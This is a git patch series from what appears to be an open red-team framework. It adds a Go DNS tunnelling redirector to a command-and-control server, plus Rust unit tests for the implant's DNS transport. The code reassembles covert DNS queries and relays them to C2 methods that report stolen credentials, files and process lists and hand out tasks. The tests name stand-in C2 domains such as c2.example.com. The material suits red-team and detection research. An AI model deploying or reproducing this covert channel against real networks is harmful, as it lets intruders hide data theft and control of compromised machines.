txtRecordType: + maxCapacity = maxDNSResponseSize + case 1: + maxCapacity = 4 + case 28: + maxCapacity = 16 + default: + maxCapacity = maxDNSResponseSize + } + + slog.Debug("checking if chunking needed", "query_type", queryType, "response_size", len(responseData), + "max_capacity", maxCapacity, "packet_type", string(pktType)) + + if queryType != txtRecordType && len(responseData) > maxCapacity && (pktType == typeEnd || pktType == typeInit) { + var conv *Conversation + var actualConvID string + + if pktType == typeInit { + actualConvID = convID + conv = &Conversation{ + id: actualConvID, + lastActivity: time.Now(), + responseData: responseData, + responseCRC: calculateCRC16(responseData), + isBinaryChunking: true, + } + r.conversations.Store(actualConvID, conv) + } else { + convVal, ok := r.conversations.Load(convID) + if !ok { + slog.Error("conversation not found for chunking", "conv_id", convID) + r.sendDNSResponse(conn, addr, transactionID, domain, responseData, queryType) + return + } + conv = convVal.(*Conversation) + actualConvID = convID + } + + conv.mu.Lock() + + conv.responseData = responseData + conv.responseCRC = calculateCRC16(responseData) + conv.isBinaryChunking = true + + conv.responseChunks = nil + for i := 0; i < len(responseData); i += maxCapacity { + end := i + maxCapacity + if end > len(responseData) { + end = len(responseData) + } + conv.responseChunks = append(conv.responseChunks, string(responseData[i:end])) + } + + conv.mu.Unlock() + + var response []byte + if maxCapacity <= 4 { + if len(conv.responseChunks) > 65535 { + slog.Error("too many chunks for binary format", "chunks", len(conv.responseChunks)) + r.sendErrorResponse(conn, addr, transactionID) + return + } + response = make([]byte, 4) + response[0] = 0xFF + response[1] = byte(len(conv.responseChunks) >> 8) + response[2] = byte(len(conv.responseChunks) & 0xFF) + response[3] = byte(conv.responseCRC & 0xFF) + + slog.Debug("using compact binary chunked indicator", + "chunks", 
len(conv.responseChunks), "crc_low", response[3]) + } else { + responseStr := fmt.Sprintf("%s%s:%s", respChunked, encodeSeq(len(conv.responseChunks)), encodeBase36CRC(int(conv.responseCRC))) + response = []byte(responseStr) + } + + slog.Debug("response too large for record type, using multi-query chunking", + "conv_id", actualConvID, "packet_type", string(pktType), "data_size", len(responseData), + "max_capacity", maxCapacity, "query_type", queryType, "chunks", len(conv.responseChunks), + "indicator_size", len(response)) + + r.sendDNSResponse(conn, addr, transactionID, domain, response, queryType) + return + } + + success := r.sendDNSResponse(conn, addr, transactionID, domain, responseData, queryType) + + if success && pktType == typeEnd && !strings.HasPrefix(string(responseData), respChunked) { + r.conversations.Delete(convID) + slog.Debug("conversation completed and cleaned up", "conv_id", convID) + } +} + +// handleInitPacket processes init packet and creates conversation +// Init payload format: [method_code:2][total_chunks:5][crc:4] +func (r *Redirector) handleInitPacket(tempConvID string, data string) ([]byte, error) { + slog.Debug("handling init packet", "temp_conv_id", tempConvID, "data", data, "data_len", len(data)) + + // Payload: method(2) + chunks(5) + crc(4) = 11 chars + if len(data) < 11 { + slog.Debug("init payload too short", "expected", 11, "got", len(data)) + return nil, fmt.Errorf("init payload too short: expected 11, got %d", len(data)) + } + + methodCode := data[:2] + totalChunksStr := data[2:7] + crcStr := data[7:11] + + slog.Debug("parsing init payload", "method_code", methodCode, "chunks_str", totalChunksStr, "crc_str", crcStr) + + totalChunks, err := decodeSeq(totalChunksStr) + if err != nil { + return nil, fmt.Errorf("invalid total chunks: %w", err) + } + + // CRC is base36-encoded (4 chars) + expectedCRC, err := decodeBase36CRC(crcStr) + if err != nil { + return nil, fmt.Errorf("invalid CRC: %w", err) + } + + methodPath := 
codeToMethod(methodCode) + realConvID := generateConvID() + + conv := &Conversation{ + id: realConvID, + methodPath: methodPath, + totalChunks: totalChunks, + expectedCRC: uint16(expectedCRC), + chunks: make(map[int][]byte), + lastActivity: time.Now(), + } + + r.conversations.Store(realConvID, conv) + + slog.Debug("created conversation", "conv_id", realConvID, "method", methodPath, "total_chunks", totalChunks) + + return []byte(realConvID), nil +} + +// handleDataPacket stores a data chunk in the conversation +func (r *Redirector) handleDataPacket(convID string, seq int, data []byte) ([]byte, error) { + convVal, ok := r.conversations.Load(convID) + if !ok { + return nil, fmt.Errorf("unknown conversation: %s", convID) + } + + conv := convVal.(*Conversation) + conv.mu.Lock() + defer conv.mu.Unlock() + + conv.lastActivity = time.Now() + + // Ignore chunks beyond declared total (duplicates/retransmissions) + if seq >= conv.totalChunks { + slog.Warn("ignoring chunk beyond expected total", "conv_id", convID, "seq", seq, "expected_total", conv.totalChunks) + return []byte{}, nil + } + + conv.chunks[seq] = data + + dataPreview := "" + if len(data) > 0 { + previewLen := min(len(data), 16) + dataPreview = fmt.Sprintf("%x", data[:previewLen]) + } + + slog.Debug("received chunk", "conv_id", convID, "seq", seq, "chunk_len", len(data), "total_received", len(conv.chunks), "expected_total", conv.totalChunks, "data_preview", dataPreview) + + return []byte{}, nil +} + +// handleEndPacket processes end packet and returns server response +func (r *Redirector) handleEndPacket(ctx context.Context, upstream *grpc.ClientConn, convID string, lastSeq int, queryType uint16) ([]byte, error) { + convVal, ok := r.conversations.Load(convID) + if !ok { + return nil, fmt.Errorf("unknown conversation: %s", convID) + } + + conv := convVal.(*Conversation) + conv.mu.Lock() + defer conv.mu.Unlock() + + conv.lastActivity = time.Now() + + slog.Debug("end packet received", "conv_id", convID, "last_seq", 
lastSeq, "chunks_received", len(conv.chunks)) + + // Check for missing chunks + var missing []int + for i := 0; i < conv.totalChunks; i++ { + if _, ok := conv.chunks[i]; !ok { + missing = append(missing, i) + } + } + + if len(missing) > 0 { + // Return missing chunks list + missingStrs := make([]string, len(missing)) + for i, seq := range missing { + missingStrs[i] = encodeSeq(seq) + } + response := fmt.Sprintf("%s%s", respMissing, strings.Join(missingStrs, ",")) + + slog.Debug("returning missing chunks", "conv_id", convID, "count", len(missing), "missing_seqs", missing) + + return []byte(response), nil + } + + // Reassemble data (chunks now contain raw binary, not base32) + requestData := r.reassembleChunks(conv.chunks, conv.totalChunks) + + // Sanity check: ensure we have exactly the right number of chunks + if len(conv.chunks) != conv.totalChunks { + slog.Error("chunk count mismatch", "conv_id", convID, "chunks_in_map", len(conv.chunks), "total_chunks_declared", conv.totalChunks) + return []byte(respError + fmt.Sprintf("chunk_count_mismatch: have %d, expected %d", len(conv.chunks), conv.totalChunks)), nil + } + + slog.Debug("reassembled data", "conv_id", convID, "bytes_len", len(requestData)) + + // Verify CRC (chunks already contain raw decrypted data) + actualCRC := calculateCRC16(requestData) + expectedCRC := uint16(conv.expectedCRC) + + slog.Debug("CRC check", "conv_id", convID, "expected", expectedCRC, "actual", actualCRC, "data_len", len(requestData), "chunks_received", len(conv.chunks), "chunks_expected", conv.totalChunks) + + if actualCRC != expectedCRC { + errMsg := fmt.Sprintf("CRC mismatch: expected %d, got %d", expectedCRC, actualCRC) + slog.Error(errMsg, "conv_id", convID, "data_len", len(requestData), "chunks_map_size", len(conv.chunks), "total_chunks_declared", conv.totalChunks) + return []byte(respError + "invalid_crc"), nil + } + slog.Debug("reassembled and validated data", "conv_id", convID, "bytes", len(requestData)) + + // Forward to upstream 
gRPC server + responseData, err := r.forwardToUpstream(ctx, upstream, conv.methodPath, requestData) + if err != nil { + return nil, fmt.Errorf("failed to forward to upstream: %w", err) + } + + // Determine if we need to base32-encode the response + // For A/AAAA records that will use binary chunking, return raw binary + // For TXT records, return base32-encoded with "ok:" prefix + useBinaryChunking := (queryType == 1 || queryType == 28) // A or AAAA record + + if useBinaryChunking { + // Return raw binary data for A/AAAA records + // The main handler will chunk this if needed + return responseData, nil + } + + // For TXT records, use base32 encoding + encodedResponse := encodeBase32(responseData) + responseWithPrefix := respOK + encodedResponse + + if len(responseWithPrefix) > maxDNSResponseSize { + // Response too large - chunk it + slog.Debug("response too large, chunking", "conv_id", convID, "size", len(responseData), "encoded_size", len(encodedResponse)) + + // Store response data in conversation + conv.responseData = responseData + conv.responseCRC = calculateCRC16(responseData) // Use full 16-bit CRC + + // Chunk the encoded response + conv.responseChunks = nil + for i := 0; i < len(encodedResponse); i += maxResponseChunkSize { + end := i + maxResponseChunkSize + if end > len(encodedResponse) { + end = len(encodedResponse) + } + conv.responseChunks = append(conv.responseChunks, encodedResponse[i:end]) + } + + // Return chunked response indicator: "r:[num_chunks]:[crc]" + response := fmt.Sprintf("%s%s:%s", respChunked, encodeSeq(len(conv.responseChunks)), encodeBase36CRC(int(conv.responseCRC))) + slog.Debug("returning chunked response indicator", "conv_id", convID, "chunks", len(conv.responseChunks), "crc", conv.responseCRC) // Don't delete conversation yet - client will fetch chunks + return []byte(response), nil + } + + // Return success with response + // Note: Conversation will be deleted by the main handler after successful send + return 
[]byte(responseWithPrefix), nil +} + +// handleFetchPacket serves a response chunk to the client +func (r *Redirector) handleFetchPacket(convID string, chunkSeq int) ([]byte, error) { + convVal, ok := r.conversations.Load(convID) + if !ok { + return nil, fmt.Errorf("unknown conversation: %s", convID) + } + + conv := convVal.(*Conversation) + conv.mu.Lock() + defer conv.mu.Unlock() + + conv.lastActivity = time.Now() + + // Check if this is the final fetch (cleanup request) + if chunkSeq >= len(conv.responseChunks) { + // Client is done fetching - clean up conversation + r.conversations.Delete(convID) + slog.Debug("conversation completed and cleaned up", "conv_id", convID) + return []byte(respOK), nil + } + + // Return the requested chunk + if chunkSeq < 0 || chunkSeq >= len(conv.responseChunks) { + return nil, fmt.Errorf("invalid chunk sequence: %d (total: %d)", chunkSeq, len(conv.responseChunks)) + } + + chunk := conv.responseChunks[chunkSeq] + slog.Debug("serving response chunk", "conv_id", convID, "seq", chunkSeq, "size", len(chunk), "is_binary", conv.isBinaryChunking) + + // For binary chunking (A/AAAA), return raw bytes + // For text chunking (TXT), return "ok:" prefix + base32 data + if conv.isBinaryChunking { + return []byte(chunk), nil + } + return []byte(respOK + chunk), nil +} + +// reassembleChunks combines chunks in order +func (r *Redirector) reassembleChunks(chunks map[int][]byte, totalChunks int) []byte { + var result []byte + for i := 0; i < totalChunks; i++ { + if chunk, ok := chunks[i]; ok { + slog.Debug("reassembling chunk", "seq", i, "chunk_len", len(chunk), "total_so_far", len(result)) + result = append(result, chunk...) 
+ } else { + // This should never happen since we check for missing chunks first + slog.Error("CRITICAL: Missing chunk during reassembly", "seq", i, "total_chunks", totalChunks, "chunks_present", len(chunks)) + } + } + slog.Debug("reassembly complete", "final_len", len(result), "total_chunks", totalChunks) + return result +} + +// forwardToUpstream sends request to gRPC server and returns response +func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.ClientConn, methodPath string, requestData []byte) ([]byte, error) { + // Create gRPC stream + md := metadata.New(map[string]string{}) + ctx = metadata.NewOutgoingContext(ctx, md) + + stream, err := upstream.NewStream(ctx, &grpc.StreamDesc{ + StreamName: methodPath, + ServerStreams: true, + ClientStreams: true, + }, methodPath, grpc.CallContentSubtype("raw")) + if err != nil { + return nil, fmt.Errorf("failed to create stream: %w", err) + } + + // Determine request/response streaming types + isClientStreaming := methodPath == "/c2.C2/ReportFile" + isServerStreaming := methodPath == "/c2.C2/FetchAsset" + + if isClientStreaming { + // For client streaming, parse length-prefixed chunks and send individually + offset := 0 + chunkCount := 0 + for offset < len(requestData) { + if offset+4 > len(requestData) { + break + } + + // Read 4-byte length prefix + msgLen := binary.BigEndian.Uint32(requestData[offset : offset+4]) + offset += 4 + + if offset+int(msgLen) > len(requestData) { + return nil, fmt.Errorf("invalid chunk length: %d bytes at offset %d", msgLen, offset) + } + + // Send individual chunk + chunk := requestData[offset : offset+int(msgLen)] + if err := stream.SendMsg(chunk); err != nil { + return nil, fmt.Errorf("failed to send chunk %d: %w", chunkCount, err) + } + + offset += int(msgLen) + chunkCount++ + } + + slog.Debug("sent client streaming chunks", "method", methodPath, "chunks", chunkCount) + } else { + // For unary/server-streaming, send the request as-is + if err := 
stream.SendMsg(requestData); err != nil { + return nil, fmt.Errorf("failed to send message: %w", err) + } + } + + if err := stream.CloseSend(); err != nil { + return nil, fmt.Errorf("failed to close send: %w", err) + } + + // Receive response(s) + var responseData []byte + responseCount := 0 + for { + var msg []byte + err := stream.RecvMsg(&msg) + if err != nil { + // Check if EOF (normal end of stream) + if stat, ok := status.FromError(err); ok { + if stat.Code() == codes.OK || stat.Code() == codes.Unavailable { + break + } + } + // For streaming responses, we may receive multiple messages + if err.Error() == "EOF" { + break + } + return nil, fmt.Errorf("failed to receive message: %w", err) + } + + // Append message data + if len(msg) > 0 { + if isServerStreaming { + // For server streaming, add 4-byte length prefix before each response chunk + lengthPrefix := make([]byte, 4) + binary.BigEndian.PutUint32(lengthPrefix, uint32(len(msg))) + responseData = append(responseData, lengthPrefix...) + responseData = append(responseData, msg...) + } else { + // For unary, just append the response as-is (no length prefix) + responseData = append(responseData, msg...) 
+ } + responseCount++ + } + } + + slog.Debug("received responses", "method", methodPath, "count", responseCount, "total_bytes", len(responseData)) + + return responseData, nil +} + +// parseDomainName extracts the domain name from a DNS query +func (r *Redirector) parseDomainName(data []byte) (string, error) { + var labels []string + offset := 0 + + for offset < len(data) { + length := int(data[offset]) + if length == 0 { + break + } + offset++ + + if offset+length > len(data) { + return "", fmt.Errorf("invalid label length") + } + + label := string(data[offset : offset+length]) + labels = append(labels, label) + offset += length + } + + return strings.Join(labels, "."), nil +} + +// parseDomainNameAndType extracts both domain name and query type from DNS question +func (r *Redirector) parseDomainNameAndType(data []byte) (string, uint16, error) { + var labels []string + offset := 0 + + // Parse domain name + for offset < len(data) { + length := int(data[offset]) + if length == 0 { + offset++ + break + } + offset++ + + if offset+length > len(data) { + return "", 0, fmt.Errorf("invalid label length") + } + + label := string(data[offset : offset+length]) + labels = append(labels, label) + offset += length + } + + // Parse query type (2 bytes after domain name) + if offset+2 > len(data) { + return "", 0, fmt.Errorf("query too short for type field") + } + + queryType := binary.BigEndian.Uint16(data[offset : offset+2]) + domain := strings.Join(labels, ".") + + return domain, queryType, nil +} + +// sendDNSResponse sends a DNS response with the appropriate record type +// Returns true if response was sent successfully, false if it failed +func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, transactionID uint16, domain string, data []byte, queryType uint16) bool { + response := make([]byte, 0, 512) + + // DNS Header + response = append(response, byte(transactionID>>8), byte(transactionID)) + response = append(response, 0x81, 0x80) // Flags: Response, 
no error + response = append(response, 0x00, 0x01) // Questions: 1 + response = append(response, 0x00, 0x01) // Answers: 1 + response = append(response, 0x00, 0x00) // Authority RRs: 0 + response = append(response, 0x00, 0x00) // Additional RRs: 0 + + // Question section (echo the question) + for _, label := range strings.Split(domain, ".") { + if len(label) == 0 { + continue + } + response = append(response, byte(len(label))) + response = append(response, []byte(label)...) + } + response = append(response, 0x00) // End of domain + response = append(response, 0x00, byte(queryType)) // Type: echo query type + response = append(response, 0x00, byte(dnsClassIN)) // Class: IN + + // Answer section + // Name (pointer to question) + response = append(response, 0xC0, 0x0C) + // Type: echo query type + response = append(response, 0x00, byte(queryType)) + // Class: IN + response = append(response, 0x00, byte(dnsClassIN)) + // TTL: 60 seconds + response = append(response, 0x00, 0x00, 0x00, 0x3C) + + // Build RDATA based on query type + var rdata []byte + + switch queryType { + case txtRecordType: + // TXT record: split data into 255-byte chunks + txtData := data + var txtChunks [][]byte + for len(txtData) > 0 { + chunkSize := len(txtData) + if chunkSize > 255 { + chunkSize = 255 + } + txtChunks = append(txtChunks, txtData[:chunkSize]) + txtData = txtData[chunkSize:] + } + + // If no data, add an empty TXT string + if len(txtChunks) == 0 { + txtChunks = append(txtChunks, []byte{}) + } + + // Build TXT RDATA + for _, chunk := range txtChunks { + rdata = append(rdata, byte(len(chunk))) + rdata = append(rdata, chunk...) 
+ } + + case 1: // A record (4 bytes capacity) + // Pad to 4 bytes (data already validated to fit) + rdata = make([]byte, 4) + copy(rdata, data) + + case 28: // AAAA record (16 bytes capacity) + // Pad to 16 bytes (data already validated to fit) + rdata = make([]byte, 16) + copy(rdata, data) + + default: + // Unsupported record type, fallback to TXT + slog.Warn("unsupported query type, using TXT", "query_type", queryType) + rdata = []byte{byte(len(data))} + rdata = append(rdata, data...) + } + + // RDLENGTH + response = append(response, byte(len(rdata)>>8), byte(len(rdata))) + // RDATA + response = append(response, rdata...) + + // Send response + _, err := conn.WriteToUDP(response, addr) + if err != nil { + slog.Error("failed to send DNS response", "error", err) + return false + } + return true +} + +// sendErrorResponse sends a DNS error response +func (r *Redirector) sendErrorResponse(conn *net.UDPConn, addr *net.UDPAddr, transactionID uint16) { + response := make([]byte, dnsHeaderSize) + binary.BigEndian.PutUint16(response[0:2], transactionID) + response[2] = 0x81 + response[3] = 0x83 // RCODE: Name Error + + conn.WriteToUDP(response, addr) +} + +// generateConvID generates a random conversation ID +func generateConvID() string { + const chars = "0123456789abcdefghijklmnopqrstuvwxyz" + b := make([]byte, convIDSize) + for i := range b { + b[i] = chars[rand.Intn(len(chars))] + } + return string(b) +} + +// codeToMethod maps 2-character method code to gRPC path +// Codes: ct=ClaimTasks, fa=FetchAsset, rc=ReportCredential, +// +// rf=ReportFile, rp=ReportProcessList, rt=ReportTaskOutput +func codeToMethod(code string) string { + methods := map[string]string{ + "ct": "/c2.C2/ClaimTasks", + "fa": "/c2.C2/FetchAsset", + "rc": "/c2.C2/ReportCredential", + "rf": "/c2.C2/ReportFile", + "rp": "/c2.C2/ReportProcessList", + "rt": "/c2.C2/ReportTaskOutput", + } + + if path, ok := methods[code]; ok { + return path + } + + return "/c2.C2/ClaimTasks" +} + +// encodeSeq encodes 
sequence number to 5-digit base36 (max: 60,466,175) +func encodeSeq(seq int) string { + const base36 = "0123456789abcdefghijklmnopqrstuvwxyz" + digit4 := (seq / 1679616) % 36 // 36^4 + digit3 := (seq / 46656) % 36 // 36^3 + digit2 := (seq / 1296) % 36 // 36^2 + digit1 := (seq / 36) % 36 // 36^1 + digit0 := seq % 36 // 36^0 + return string([]byte{base36[digit4], base36[digit3], base36[digit2], base36[digit1], base36[digit0]}) +} + +// decodeSeq decodes 5-character base36 sequence number +func decodeSeq(encoded string) (int, error) { + if len(encoded) != 5 { + return 0, fmt.Errorf("invalid sequence length: expected 5, got %d", len(encoded)) + } + + val := func(c byte) (int, error) { + switch { + case c >= '0' && c <= '9': + return int(c - '0'), nil + case c >= 'a' && c <= 'z': + return int(c-'a') + 10, nil + default: + return 0, fmt.Errorf("invalid base36 character: %c", c) + } + } + + d4, _ := val(encoded[0]) + d3, _ := val(encoded[1]) + d2, _ := val(encoded[2]) + d1, _ := val(encoded[3]) + d0, err := val(encoded[4]) + if err != nil { + return 0, err + } + + return d4*1679616 + d3*46656 + d2*1296 + d1*36 + d0, nil +} + +// encodeBase36CRC encodes CRC16 to 4-digit base36 (range: 0-1,679,615 covers 0-65,535) +// Used only for init packet payload and chunked response metadata +func encodeBase36CRC(crc int) string { + const base36 = "0123456789abcdefghijklmnopqrstuvwxyz" + digit3 := (crc / 46656) % 36 // 36^3 + digit2 := (crc / 1296) % 36 // 36^2 + digit1 := (crc / 36) % 36 // 36^1 + digit0 := crc % 36 // 36^0 + return string([]byte{base36[digit3], base36[digit2], base36[digit1], base36[digit0]}) +} + +// decodeBase36CRC decodes 4-character base36 CRC value +func decodeBase36CRC(encoded string) (int, error) { + if len(encoded) != 4 { + return 0, fmt.Errorf("invalid CRC length: expected 4, got %d", len(encoded)) + } + + val := func(c byte) (int, error) { + switch { + case c >= '0' && c <= '9': + return int(c - '0'), nil + case c >= 'a' && c <= 'z': + return int(c-'a') + 
10, nil + default: + return 0, fmt.Errorf("invalid base36 character: %c", c) + } + } + + d3, _ := val(encoded[0]) + d2, _ := val(encoded[1]) + d1, _ := val(encoded[2]) + d0, err := val(encoded[3]) + if err != nil { + return 0, err + } + + return d3*46656 + d2*1296 + d1*36 + d0, nil +} + +// calculateCRC16 computes CRC16-CCITT checksum (polynomial 0x1021, init 0xFFFF) +func calculateCRC16(data []byte) uint16 { + var crc uint16 = 0xFFFF + for _, b := range data { + crc ^= uint16(b) << 8 + for i := 0; i < 8; i++ { + if (crc & 0x8000) != 0 { + crc = (crc << 1) ^ 0x1021 + } else { + crc <<= 1 + } + } + } + return crc +} + +// encodeBase32 encodes data to lowercase base32 without padding +func encodeBase32(data []byte) string { + if len(data) == 0 { + return "" + } + encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(data) + return strings.ToLower(encoded) +} + +// decodeBase32 decodes lowercase base32 data without padding +func decodeBase32(encoded string) ([]byte, error) { + if len(encoded) == 0 { + return []byte{}, nil + } + encoded = strings.ToUpper(encoded) + return base32.StdEncoding.WithPadding(base32.NoPadding).DecodeString(encoded) +} From 237da971d4fc98bc019094469ff03a63c55c3657 Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Fri, 5 Dec 2025 01:24:37 -0600 Subject: [PATCH 02/17] Add unit tests --- implants/lib/transport/src/dns.rs | 217 +++++++++++++ tavern/app.go | 2 +- tavern/internal/redirectors/dns/dns.go | 326 +++++++++---------- tavern/internal/redirectors/dns/dns_test.go | 337 ++++++++++++++++++++ 4 files changed, 711 insertions(+), 171 deletions(-) create mode 100644 tavern/internal/redirectors/dns/dns_test.go diff --git a/implants/lib/transport/src/dns.rs b/implants/lib/transport/src/dns.rs index 12cd3570f..cf40bcda9 100644 --- a/implants/lib/transport/src/dns.rs +++ b/implants/lib/transport/src/dns.rs @@ -1408,3 +1408,220 @@ impl Transport for DNS { )) } } + +#[cfg(test)] +mod 
tests { + use super::*; + + #[test] + fn test_dns_init_defaults() { + let dns = DNS::init(); + + assert!(dns.dns_server.is_none()); + assert!(dns.base_domain.is_empty()); + assert_eq!(dns.preferred_record_type, TXT_RECORD_TYPE); + assert_eq!(dns.current_record_type, TXT_RECORD_TYPE); + assert!(dns.enable_fallback); + } + + #[test] + fn test_dns_new_parses_callback() { + // Test with specific DNS server + let dns = DNS::new("dns://8.8.8.8/c2.example.com".to_string(), None).unwrap(); + assert_eq!(dns.dns_server, Some("8.8.8.8:53".to_string())); + assert_eq!(dns.base_domain, "c2.example.com"); + assert_eq!(dns.preferred_record_type, TXT_RECORD_TYPE); + assert!(dns.enable_fallback); + + // Test with system resolver (*) + let dns = DNS::new("dns://*/c2.example.com".to_string(), None).unwrap(); + assert!(dns.dns_server.is_none()); + assert_eq!(dns.base_domain, "c2.example.com"); + + // Test with A record type preference and fallback disabled + let dns = DNS::new( + "dns://*/c2.example.com?type=A&fallback=false".to_string(), + None, + ) + .unwrap(); + assert_eq!(dns.preferred_record_type, A_RECORD_TYPE); + assert_eq!(dns.current_record_type, A_RECORD_TYPE); + assert!(!dns.enable_fallback); + } + + #[test] + fn test_dns_new_invalid_type_errors() { + let result = DNS::new("dns://8.8.8.8/c2.example.com?type=BOGUS".to_string(), None); + assert!(result.is_err()); + let err_msg = result.unwrap_err().to_string(); + assert!(err_msg.contains("type") || err_msg.contains("BOGUS")); + } + + #[test] + fn test_calculate_max_data_size_positive() { + let dns = DNS { + dns_server: None, + base_domain: "c2.example.com".to_string(), + socket: None, + preferred_record_type: TXT_RECORD_TYPE, + current_record_type: TXT_RECORD_TYPE, + enable_fallback: true, + }; + + let max_size = dns.calculate_max_data_size(); + assert!(max_size > 0, "max data size should be positive"); + + // Test with a very long base domain - should be smaller + let dns_long = DNS { + dns_server: None, + base_domain: 
"very.long.subdomain.hierarchy.for.testing.purposes.c2.example.com" + .to_string(), + socket: None, + preferred_record_type: TXT_RECORD_TYPE, + current_record_type: TXT_RECORD_TYPE, + enable_fallback: true, + }; + + let max_size_long = dns_long.calculate_max_data_size(); + assert!(max_size_long > 0, "long domain max size should be positive"); + assert!( + max_size_long < max_size, + "longer domain should reduce available data size" + ); + } + + #[test] + fn test_generate_conv_id_length() { + let id = DNS::generate_conv_id(); + assert_eq!(id.len(), CONV_ID_SIZE); + + // Verify all characters are base32 lowercase (a-z0-7) + for c in id.chars() { + assert!( + c.is_ascii_lowercase() || c.is_ascii_digit(), + "conv_id should contain only lowercase alphanumeric chars" + ); + } + } + + #[test] + fn test_encode_decode_seq() { + // Test round-trip encoding/decoding + let test_values = vec![0, 1, 42, 1234, 60466175]; // Max is 36^5 - 1 + + for val in test_values { + let encoded = DNS::encode_seq(val); + assert_eq!(encoded.len(), SEQ_SIZE); + + let decoded = DNS::decode_seq(&encoded).unwrap(); + assert_eq!(decoded, val, "seq {} should round-trip correctly", val); + } + } + + #[test] + fn test_encode_decode_base36_crc() { + // Test round-trip encoding/decoding + let test_crcs = vec![0, 1, 255, 12345, 65535]; // 16-bit values + + for crc in test_crcs { + let encoded = DNS::encode_base36_crc(crc as u16); + assert_eq!(encoded.len(), 4); + + let decoded = DNS::decode_base36_crc(&encoded).unwrap(); + assert_eq!( + decoded, crc as u16, + "CRC {} should round-trip correctly", + crc + ); + } + } + + #[test] + fn test_calculate_crc16() { + // Test with known data + let data1 = b"hello world"; + let crc1 = DNS::calculate_crc16(data1); + assert!(crc1 > 0, "CRC should be non-zero for non-empty data"); + + // Same data should produce same CRC + let crc1_again = DNS::calculate_crc16(data1); + assert_eq!(crc1, crc1_again, "CRC should be deterministic"); + + // Different data should produce 
different CRC (highly likely) + let data2 = b"hello world!"; + let crc2 = DNS::calculate_crc16(data2); + assert_ne!(crc1, crc2, "different data should produce different CRC"); + } + + #[tokio::test] + async fn test_handle_response_ok_prefix() { + // Create a mock DNS instance + let mut dns = DNS::init(); + dns.base_domain = "example.com".to_string(); + + // Simple test data + let test_data = b"test response data"; + let encoded_data = DNS::encode_base32(test_data); + let response = format!("{}{}", RESP_OK, encoded_data); + + // Call handle_response with empty chunks (no retries needed) + let conv_id = "test12345678"; + let chunks: Vec> = vec![]; + + let result = dns + .handle_response(conv_id, response.as_bytes(), &chunks, 0) + .await; + + assert!(result.is_ok()); + let decoded = result.unwrap(); + assert_eq!(decoded, test_data); + } + + #[tokio::test] + async fn test_handle_response_error_prefix() { + let mut dns = DNS::init(); + dns.base_domain = "example.com".to_string(); + + let response = b"e:something_broke"; + let conv_id = "test12345678"; + let chunks: Vec> = vec![]; + + let result = dns.handle_response(conv_id, response, &chunks, 0).await; + + assert!(result.is_err()); + let err_msg = result.unwrap_err().to_string(); + assert!(err_msg.contains("something_broke") || err_msg.contains("error")); + } + + #[tokio::test] + async fn test_handle_response_missing_prefix() { + let mut dns = DNS::init(); + dns.base_domain = "example.com".to_string(); + + // Missing chunks response - should trigger retry or error + let response = b"m:00000,00001,00002"; + let conv_id = "test12345678"; + let chunks: Vec> = vec![b"chunk0".to_vec(), b"chunk1".to_vec()]; + + // With retry_count at max, this should error out + let result = dns.handle_response(conv_id, response, &chunks, 5).await; + + // Should either error or handle the missing chunks + // Since we're at max retries, it should error + assert!(result.is_err()); + } + + #[tokio::test] + async fn 
test_reverse_shell_not_supported() { + let mut dns = DNS::init(); + + let (_tx, rx) = tokio::sync::mpsc::channel(1); + let (resp_tx, _resp_rx) = tokio::sync::mpsc::channel(1); + + let result = dns.reverse_shell(rx, resp_tx).await; + + assert!(result.is_err()); + let err_msg = result.unwrap_err().to_string(); + assert!(err_msg.contains("reverse shell") || err_msg.contains("not support")); + } +} diff --git a/tavern/app.go b/tavern/app.go index 24edec60d..c12f0ff38 100644 --- a/tavern/app.go +++ b/tavern/app.go @@ -39,9 +39,9 @@ import ( "realm.pub/tavern/internal/www" "realm.pub/tavern/tomes" + _ "realm.pub/tavern/internal/redirectors/dns" _ "realm.pub/tavern/internal/redirectors/grpc" _ "realm.pub/tavern/internal/redirectors/http1" - _ "realm.pub/tavern/internal/redirectors/dns" ) func init() { diff --git a/tavern/internal/redirectors/dns/dns.go b/tavern/internal/redirectors/dns/dns.go index 563bf2d7a..804c750b6 100644 --- a/tavern/internal/redirectors/dns/dns.go +++ b/tavern/internal/redirectors/dns/dns.go @@ -25,14 +25,16 @@ const ( dnsHeaderSize = 12 // Standard DNS header size maxLabelLength = 63 // Maximum bytes in a DNS label txtRecordType = 16 // TXT record QTYPE + aRecordType = 1 // A record QTYPE + aaaaRecordType = 28 // AAAA record QTYPE dnsClassIN = 1 // Internet class defaultUDPPort = "53" convTimeout = 15 * time.Minute // Conversation expiration // Protocol field sizes (base36 encoding) - typeSize = 1 // Packet type: i/d/e/f - seqSize = 5 // Sequence: 36^5 = 60,466,176 max chunks - convIDSize = 12 // Conversation ID length + typeSize = 1 // Packet type: i/d/e/f + seqSize = 5 // Sequence: 36^5 = 60,466,176 max chunks + convIDSize = 12 // Conversation ID length headerSize = typeSize + seqSize + convIDSize // Packet types @@ -69,25 +71,53 @@ type Redirector struct { baseDomains []string // Accepted base domains for queries } +// GetConversation retrieves a conversation by ID (for testing) +func (r *Redirector) GetConversation(convID string) 
(*Conversation, bool) { + val, ok := r.conversations.Load(convID) + if !ok { + return nil, false + } + return val.(*Conversation), true +} + +// StoreConversation stores a conversation (for testing) +func (r *Redirector) StoreConversation(convID string, conv *Conversation) { + r.conversations.Store(convID, conv) +} + +// CleanupConversationsOnce runs cleanup logic once (for testing) +func (r *Redirector) CleanupConversationsOnce(timeout time.Duration) { + now := time.Now() + r.conversations.Range(func(key, value interface{}) bool { + conv := value.(*Conversation) + conv.mu.Lock() + if now.Sub(conv.LastActivity) > timeout { + r.conversations.Delete(key) + } + conv.mu.Unlock() + return true + }) +} + // Conversation tracks state for a request-response exchange type Conversation struct { mu sync.Mutex - id string - methodPath string // gRPC method path - totalChunks int // Expected number of request chunks - expectedCRC uint16 // CRC16 of complete request data - chunks map[int][]byte // Received request chunks - lastActivity time.Time + ID string // Exported for testing + MethodPath string // gRPC method path (exported for testing) + TotalChunks int // Expected number of request chunks (exported for testing) + ExpectedCRC uint16 // CRC16 of complete request data (exported for testing) + Chunks map[int][]byte // Received request chunks (exported for testing) + LastActivity time.Time // Exported for testing // Response chunking (for large responses) - responseData []byte - responseChunks []string // Base32 encoded (TXT) or raw binary (A/AAAA) - responseCRC uint16 - isBinaryChunking bool // true for A/AAAA, false for TXT + ResponseData []byte // Exported for testing 